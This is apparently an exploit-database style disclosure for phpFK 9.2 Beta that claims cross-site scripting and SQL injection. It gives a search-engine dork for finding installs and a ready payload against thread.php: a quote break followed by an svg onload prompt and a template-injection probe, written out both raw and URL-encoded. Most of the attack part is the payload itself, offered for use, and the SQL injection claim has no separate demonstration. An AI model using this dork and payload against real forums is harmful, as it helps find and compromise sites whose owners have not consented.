phpFK version 9.2 Beta suffers from cross site scripting and remote SQL injection vulnerabilities.
====================================================================================================================================
| # Title : phpFK v9.2 Beta version SQLi + XSS Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0.(32-bit) |
| # Vendor : https://www.frank-karau.de/demo-forum/ |
| # Dork : Powered by: phpFK |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Use payload : /forum/thread.php?board=4&thema=349'"><svg/onload=prompt(/_indoushka_/);>{{7*7}}
[+] http://127.0.0.1/forum/thread.php?board=4&thema=349%27%22%3E%3Csvg/onload=prompt(/_indoushka_/);%3E{{7*7}}
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
|
=======================================================================================================================================